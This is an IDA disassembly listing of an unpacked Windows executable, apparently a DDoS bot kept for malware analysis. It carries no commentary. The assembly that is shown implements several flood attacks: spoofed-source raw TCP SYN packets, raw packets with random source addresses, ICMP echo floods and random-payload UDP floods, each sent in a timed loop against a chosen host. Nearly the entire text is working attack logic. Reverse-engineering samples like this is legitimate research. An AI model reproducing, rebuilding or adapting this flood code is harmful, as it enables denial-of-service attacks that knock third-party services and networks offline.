;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 049E62D55BF545ABE4228C7BDE279C40
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
HEADER segment page public 'DATA' use32
assume cs:HEADER
;org 400000h
__ImageBase dd 905A4Dh ; DATA XREF: sub_41BB6D+3E�o
; sub_41BB6D:loc_41BC12�r
dd 3, 4, 0FFFFh, 0B8h, 0
dd 40h, 8 dup(0)
dd 100h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 0FAFEEF36h, 3 dup(0A9908E72h), 0A9918E72h, 0A9908EF9h
dd 0A9CD81B1h, 0A9908E75h, 0A99C9209h, 0A9908E71h, 0A99E92F1h
dd 0A9908E6Ah, 0A99B911Dh, 0A9908E7Eh, 0A99A911Dh, 0A9908E0Fh
dd 0A9A0AD26h, 0A9908E73h, 0A9A1AD26h, 0A9908E44h, 68636952h
dd 0A9908E72h, 4 dup(0)
dd 4550h, 6014Ch, 481F5901h, 2 dup(0)
dd 30F00E0h, 4550h, 2014Ch, 3 dup(0)
dd 30F00E0h, 6010Bh, 0
dd 2B800h, 0
aFip db 'ӑP|',0
db 0C0h, 11h, 0
dd 24000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 13A000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 137000h, 2E90h, 1Ch dup(0)
a_text db '.text',0
align 10h
dd 136000h, 1000h, 135200h, 400h, 3 dup(0)
dd 0E0000020h, 6164692Eh, 6174h, 3000h, 137000h, 3000h
dd 135600h, 3 dup(0)
dd 0E0000020h, 74610032h, 61h, 0F593Dh, 26000h, 8C00h
dd 14E00h, 3 dup(0)
dd 0C0000040h, 78650033h, 74h, 11CBFh, 11C000h, 0B800h
dd 1DA00h, 3 dup(0)
dd 0E0000040h, 61640034h, 6174h, 0D8Ch, 12E000h, 0E00h
dd 29200h, 3 dup(0)
dd 0E0000040h, 74610035h, 61h, 7110h, 12F000h, 1C00h, 2A000h
dd 3 dup(0)
dd 0E0000040h, 46h dup(0)
align 1000h
HEADER ends
; File Name : u:\work\049e62d55bf545abe4228c7bde279c40_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00136000 (1269760.)
; Section size in file : 00135200 (1266176.)
; Offset to raw data for section: 00000400
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_401000(LPVOID)
sub_401000 proc near ; DATA XREF: sub_40FCA3+3AD7�o
var_494 = dword ptr -494h
s = dword ptr -294h
var_290 = dword ptr -290h
name = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_18C = dword ptr -18Ch
var_10C = dword ptr -10Ch
var_8C = dword ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+s]
rep movsd
mov dword ptr [eax+290h], 1
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
lea eax, [ebp+var_18C]
push eax ; int
lea eax, [ebp+var_8C]
push eax ; int
lea eax, [ebp+var_20C]
push eax ; int
lea eax, [ebp+name]
push eax ; name
call sub_4013E8
push eax
lea eax, [ebp+var_494]
push 426050h
push eax
call sub_41795B
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_401090
push esi ; int
lea eax, [ebp+var_494]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_10C]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_401090: ; CODE XREF: sub_401000+6E�j
lea eax, [ebp+var_494]
push eax
call sub_40CB08
push [ebp+var_290]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_401000 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4010B2(int, u_long hostlong, int, u_short hostshort, int)
sub_4010B2 proc near ; CODE XREF: sub_4013E8+40�p
WSAData = WSAData ptr -284h
var_F4 = byte ptr -0F4h
buf = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
to = sockaddr ptr -58h
Frequency = LARGE_INTEGER ptr -48h
optval = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
s = dword ptr -20h
PerformanceCount= LARGE_INTEGER ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
hostlong = dword ptr 0Ch
arg_8 = dword ptr 10h
hostshort = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+buf], bl
rep stosd
stosw
stosb
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call WSAStartup_0
test eax, eax
jz short loc_4010F2
xor eax, eax
jmp loc_4013BB
; ---------------------------------------------------------------------------
loc_4010F2: ; CODE XREF: sub_4010B2+37�j
xor edi, edi
inc edi
push edi ; dwFlags
push ebx ; g
push ebx ; lpProtocolInfo
push 0FFh ; protocol
push 3 ; type
push 2 ; af
call WSASocketA ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jz loc_4013B3
push esi
lea ecx, [ebp+optval]
push 4 ; optlen
push ecx ; optval
push 2 ; optname
push ebx ; level
push eax ; s
mov dword ptr [ebp+optval], edi
call setsockopt_0
cmp eax, 0FFFFFFFFh
jz loc_4013A9
push dword ptr [ebp+hostshort] ; hostshort
mov [ebp+to.sa_family], 2
call htons_2
mov esi, [ebp+arg_0]
push 28h ; hostshort
mov word ptr [ebp+to.sa_data], ax
mov dword ptr [ebp+to.sa_data+2], esi
mov [ebp+var_34], 45h
call htons_2
push dword ptr [ebp+hostshort] ; hostshort
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call htons_2
mov [ebp+var_12], ax
call sub_4179B7
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx ; hostshort
call htons_2
push 12345678h ; hostlong
mov [ebp+var_14], ax
call htonl_0
push 4260D0h
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4011C2
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011C2: ; CODE XREF: sub_4010B2+105�j
push 4260C4h
push [ebp+arg_8]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4011DE
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011DE: ; CODE XREF: sub_4010B2+121�j
push 4260B8h
push [ebp+arg_8]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_401216
call sub_4179B7
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_4179B7
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_401216: ; CODE XREF: sub_4010B2+10E�j
; sub_4010B2+12A�j ...
push 4000h ; hostshort
mov [ebp+var_8], 50h
call htons_2
mov [ebp+var_6], ax
lea eax, [ebp+Frequency]
push eax ; lpFrequency
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call QueryPerformanceFrequency ; QueryPerformanceFrequency
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter ; QueryPerformanceCounter
push dword ptr [ebp+Frequency+4]
mov eax, [ebp+arg_10]
cdq
push dword ptr [ebp+Frequency]
push edx
push eax
call sub_417E10
add eax, dword ptr [ebp+PerformanceCount]
push 14h
pop esi
adc edx, dword ptr [ebp+PerformanceCount+4]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_401264: ; CODE XREF: sub_4010B2+2E2�j
; sub_4010B2+2EE�j
mov [ebp+var_4], bx
call sub_4179B7
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx ; hostshort
call htons_2
mov [ebp+var_14], ax
call sub_4179B7
mov edi, eax
shl edi, 10h
call sub_4179B7
or edi, eax
push edi ; hostshort
call htons_2
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+hostlong]
inc [ebp+hostlong]
push eax ; hostlong
call htonl_0
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi ; hostshort
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call htons_2
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417A40
lea eax, [ebp+buf]
push 34h
push eax
call sub_40B9CB
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417A40
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_4179E0
add esp, 44h
lea eax, [ebp+buf]
push 28h
push eax
call sub_40B9CB
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+buf]
push eax
call sub_417A40
add esp, 14h
lea eax, [ebp+to]
push 10h ; tolen
push eax ; to
push ebx ; flags
lea eax, [ebp+buf]
push 28h ; len
push eax ; buf
push [ebp+s] ; s
call sendto ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4013BF
add [ebp+arg_8], eax
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter ; QueryPerformanceCounter
mov eax, dword ptr [ebp+PerformanceCount+4]
cmp eax, [ebp+var_38]
jg short loc_4013A6
jl loc_401264
mov eax, dword ptr [ebp+PerformanceCount]
cmp eax, [ebp+var_3C]
jb loc_401264
loc_4013A6: ; CODE XREF: sub_4010B2+2E0�j
mov ebx, [ebp+arg_8]
loc_4013A9: ; CODE XREF: sub_4010B2+78�j
; sub_4010B2+334�j
push [ebp+s] ; s
call closesocket_0
pop esi
loc_4013B3: ; CODE XREF: sub_4010B2+5B�j
call WSACleanup_0
mov eax, ebx
loc_4013BB: ; CODE XREF: sub_4010B2+3B�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4013BF: ; CODE XREF: sub_4010B2+2CB�j
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push 426088h
push eax
call sub_41795B
lea eax, [ebp+var_F4]
push eax
call sub_40CB08
add esp, 10h
jmp short loc_4013A9
sub_4010B2 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4013E8(char *name, int, int, int)
sub_4013E8 proc near ; CODE XREF: sub_401000+4F�p
name = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+name] ; name
call sub_40B862
push [esp+10h+arg_4]
mov esi, eax
call sub_417ECF
push [esp+14h+arg_C]
mov ebx, eax
call sub_417ECF
mov edi, eax
call sub_4179B7
cdq
mov ecx, 200h
push edi ; int
idiv ecx
push ebx ; hostshort
push [esp+20h+arg_8] ; int
lea eax, [edx+esi+100h]
push eax ; hostlong
push esi ; int
call sub_4010B2
add esp, 20h
test eax, eax
jnz short loc_401435
inc eax
loc_401435: ; CODE XREF: sub_4013E8+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4013E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_401444(LPVOID)
sub_401444 proc near ; DATA XREF: sub_40FCA3+3CD8�o
var_3BC = dword ptr -3BCh
var_1BC = dword ptr -1BCh
cp = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = dword ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
to = sockaddr ptr -1Ch
optval = byte ptr -0Ch
var_8 = dword ptr -8
s = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
push 0FFh ; protocol
inc ebx
push 3 ; type
rep movsd
push 2 ; af
mov [eax+19Ch], ebx
call socket_0
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jnz short loc_4014DF
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push 426218h
push eax
call sub_41795B
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4014C2
push edi ; int
lea eax, [ebp+var_3BC]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+var_B8]
push eax ; int
push [ebp+var_1BC] ; s
call sub_40E1D6
add esp, 14h
loc_4014C2: ; CODE XREF: sub_401444+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_40CB08
push [ebp+var_38]
call sub_417735
pop ecx
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4014DF: ; CODE XREF: sub_401444+3A�j
lea ecx, [ebp+optval]
push 4 ; optlen
push ecx ; optval
xor edi, edi
push 2 ; optname
push edi ; level
push eax ; s
mov dword ptr [ebp+optval], ebx
call setsockopt_0
cmp eax, 0FFFFFFFFh
jnz short loc_401556
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push 4261D0h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_401539
push edi ; int
lea eax, [ebp+var_3BC]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+var_B8]
push eax ; int
push [ebp+var_1BC] ; s
call sub_40E1D6
add esp, 14h
loc_401539: ; CODE XREF: sub_401444+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_40CB08
push [ebp+var_38]
call sub_417735
pop ecx
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_401444+B3�j
lea eax, [ebp+cp]
push eax ; cp
call inet_addr_0
cmp eax, 0FFFFFFFFh
jnz short loc_4015BD
lea eax, [ebp+var_3BC]
push 4261A0h
push eax
call sub_41795B
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_4015A0
push edi ; int
lea eax, [ebp+var_3BC]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+var_B8]
push eax ; int
push [ebp+var_1BC] ; s
call sub_40E1D6
add esp, 14h
loc_4015A0: ; CODE XREF: sub_401444+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_40CB08
push [ebp+var_38]
call sub_417735
pop ecx
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4015BD: ; CODE XREF: sub_401444+122�j
push 10h
lea eax, [ebp+to]
push edi
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+to.sa_family], 2
push edi ; hostshort
call htons_2
mov word ptr [ebp+to.sa_data], ax
lea eax, [ebp+cp]
push eax ; cp
call inet_addr_0
mov esi, GetTickCount
mov dword ptr [ebp+to.sa_data+2], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
jmp loc_40171E
; ---------------------------------------------------------------------------
loc_401600: ; CODE XREF: sub_401444+2EB�j
push 41Ch ; hostshort
mov byte ptr unk_440B78, 45h
call htons_2
cmp [ebp+var_2C], edi
mov word ptr unk_440B7A, ax
mov word ptr unk_440B7C, bx
mov word ptr unk_440B7E, di
mov byte ptr unk_440B80, 80h
mov byte ptr unk_440B81, bl
mov word ptr unk_440B82, di
jz short loc_40166F
call sub_4179B7
mov ebx, eax
shl ebx, 8
call sub_4179B7
add ebx, eax
shl ebx, 8
call sub_4179B7
add ebx, eax
shl ebx, 8
call sub_4179B7
add ebx, eax
mov dword ptr unk_440B84, ebx
xor ebx, ebx
inc ebx
jmp short loc_401687
; ---------------------------------------------------------------------------
loc_40166F: ; CODE XREF: sub_401444+1F9�j
push [ebp+var_1BC] ; s
call sub_40B972
pop ecx
push eax ; cp
call inet_addr_0
mov dword ptr unk_440B84, eax
loc_401687: ; CODE XREF: sub_401444+229�j
mov eax, dword ptr [ebp+to.sa_data+2]
mov dword ptr unk_440B88, eax
call sub_4179B7
cdq
mov ecx, 100h
idiv ecx
mov byte ptr unk_440B8C, dl
call sub_4179B7
cdq
mov ecx, 100h
idiv ecx
mov byte ptr unk_440B8D, dl
call sub_4179B7
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov word ptr unk_440B8E, di
mov word ptr unk_440B92, bx
inc edx
mov word ptr unk_440B90, dx
call sub_4179B7
cdq
mov ecx, 0FFh
idiv ecx
push edx
push 440B94h
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+to]
push 10h ; tolen
push eax ; to
push edi ; flags
push 41Ch ; len
push offset unk_440B78 ; buf
push [ebp+s] ; s
call sendto ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4017BA
inc [ebp+arg_0]
loc_40171E: ; CODE XREF: sub_401444+1B7�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
jbe loc_401600
push [ebp+s] ; s
call closesocket_0
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+cp]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push 426140h
push eax
call sub_41795B
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_40179D
push edi ; int
lea eax, [ebp+var_3BC]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+var_B8]
push eax ; int
push [ebp+var_1BC] ; s
call sub_40E1D6
add esp, 14h
loc_40179D: ; CODE XREF: sub_401444+337�j
lea eax, [ebp+var_3BC]
push eax
call sub_40CB08
push [ebp+var_38]
call sub_417735
pop ecx
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4017BA: ; CODE XREF: sub_401444+2D1�j
push [ebp+s] ; s
call closesocket_0
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+cp]
push [ebp+arg_0]
push eax
push 4260E0h
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_417EDA
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_401812
push edi ; int
lea eax, [ebp+var_3BC]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+var_B8]
push eax ; int
push [ebp+var_1BC] ; s
call sub_40E1D6
add esp, 14h
loc_401812: ; CODE XREF: sub_401444+3AC�j
lea eax, [ebp+var_3BC]
push eax
call sub_40CB08
push [ebp+var_38]
call sub_417735
pop ecx
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
sub_401444 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40182F(LPVOID)
sub_40182F proc near ; DATA XREF: sub_40FCA3+2F3D�o
var_10320 = byte ptr -10320h
var_344 = dword ptr -344h
s = dword ptr -144h
var_140 = dword ptr -140h
name = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
IcmpHandle = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_417F30
mov eax, [ebp+IcmpHandle]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+s]
rep movsd
xor edi, edi
inc edi
mov [eax+120h], edi
call IcmpCreateFile ; IcmpCreateFile
mov [ebp+IcmpHandle], eax
lea eax, [ebp+name]
push eax ; cp
call inet_addr_0
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40188A
lea eax, [ebp+name]
push eax ; name
call gethostbyname ; gethostbyname
cmp eax, ebx
jz short loc_401890
loc_40188A: ; CODE XREF: sub_40182F+48�j
cmp [ebp+IcmpHandle], 0FFFFFFFFh
jnz short loc_4018ED
loc_401890: ; CODE XREF: sub_40182F+59�j
lea eax, [ebp+name]
push eax
lea eax, [ebp+var_344]
push 426298h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_4018D0
push ebx ; int
lea eax, [ebp+var_344]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_140]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_4018D0: ; CODE XREF: sub_40182F+7F�j
lea eax, [ebp+var_344]
push eax
call sub_40CB08
push [ebp+var_30]
call sub_417735
pop ecx
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4018ED: ; CODE XREF: sub_40182F+5F�j
cmp eax, ebx
jz short loc_4018FD
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_401900
; ---------------------------------------------------------------------------
loc_4018FD: ; CODE XREF: sub_40182F+C0�j
mov [ebp+var_4], esi
loc_401900: ; CODE XREF: sub_40182F+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_4179E0
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_401920
mov [ebp+var_3C], eax
loc_401920: ; CODE XREF: sub_40182F+EC�j
cmp [ebp+var_38], edi
jge short loc_401928
mov [ebp+var_38], edi
loc_401928: ; CODE XREF: sub_40182F+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_401955
loc_40192F: ; CODE XREF: sub_40182F+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+IcmpHandle]
call IcmpSendEcho ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_40192F
loc_401955: ; CODE XREF: sub_40182F+FE�j
push [ebp+IcmpHandle] ; IcmpHandle
call IcmpCloseHandle ; IcmpCloseHandle
lea eax, [ebp+name]
push eax
lea eax, [ebp+var_344]
push 42625Ch
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40199E
push ebx ; int
lea eax, [ebp+var_344]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_140]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40199E: ; CODE XREF: sub_40182F+14D�j
lea eax, [ebp+var_344]
push eax
call sub_40CB08
push [ebp+var_30]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_40182F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4019BB(LPVOID)
sub_4019BB proc near ; DATA XREF: sub_40FCA3+3077�o
var_10312 = byte ptr -10312h
buf = byte ptr -10310h
var_334 = dword ptr -334h
s = dword ptr -134h
var_130 = dword ptr -130h
name = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
dwMilliseconds = dword ptr -28h
hostshort = word ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
to = sockaddr ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_417F30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+s]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
pop ecx
push 11h ; protocol
push 2 ; type
push 2 ; af
call socket_0
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+to]
push edi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+name]
mov [ebp+to.sa_family], 2
push eax ; cp
call inet_addr_0
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_401AA0
lea eax, [ebp+name]
push eax ; name
call gethostbyname ; gethostbyname
cmp eax, edi
jnz short loc_401A99
lea eax, [ebp+name]
push eax
lea eax, [ebp+var_334]
push 42630Ch
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_401A7C
push edi ; int
lea eax, [ebp+var_334]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+var_130]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_401A7C: ; CODE XREF: sub_4019BB+9F�j
lea eax, [ebp+var_334]
push eax
call sub_40CB08
push [ebp+var_20]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_401A99: ; CODE XREF: sub_4019BB+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_401AA3
; ---------------------------------------------------------------------------
loc_401AA0: ; CODE XREF: sub_4019BB+6E�j
lea eax, [ebp+arg_0]
loc_401AA3: ; CODE XREF: sub_4019BB+E3�j
mov eax, [eax]
cmp dword ptr [ebp+hostshort], edi
mov dword ptr [ebp+to.sa_data+2], eax
jnz short loc_401ABE
call sub_4179B7
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_401AC1
; ---------------------------------------------------------------------------
loc_401ABE: ; CODE XREF: sub_4019BB+F0�j
push dword ptr [ebp+hostshort] ; hostshort
loc_401AC1: ; CODE XREF: sub_4019BB+101�j
call htons_2
cmp dword ptr [ebp+hostshort], esi
mov word ptr [ebp+to.sa_data], ax
jge short loc_401AD3
mov dword ptr [ebp+hostshort], esi
loc_401AD3: ; CODE XREF: sub_4019BB+113�j
mov eax, 0FFFFh
cmp dword ptr [ebp+hostshort], eax
jle short loc_401AE0
mov dword ptr [ebp+hostshort], eax
loc_401AE0: ; CODE XREF: sub_4019BB+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+dwMilliseconds], edi
mov [ebp+var_30], eax
jnz short loc_401AF4
mov [ebp+dwMilliseconds], esi
loc_401AF4: ; CODE XREF: sub_4019BB+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_401B6D
loc_401AFB: ; CODE XREF: sub_4019BB+158�j
call sub_4179B7
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_401AFB
jmp short loc_401B6D
; ---------------------------------------------------------------------------
loc_401B17: ; CODE XREF: sub_4019BB+1B5�j
dec [ebp+var_30]
push 0Bh
pop esi
loc_401B1D: ; CODE XREF: sub_4019BB+192�j
lea eax, [ebp+to]
push 10h ; tolen
push eax ; to
push edi ; flags
call sub_4179B7
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push ebx ; s
call sendto ; sendto
push [ebp+dwMilliseconds] ; dwMilliseconds
call Sleep ; Sleep
dec esi
jnz short loc_401B1D
cmp dword ptr [ebp+hostshort], edi
jnz short loc_401B6D
call sub_4179B7
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
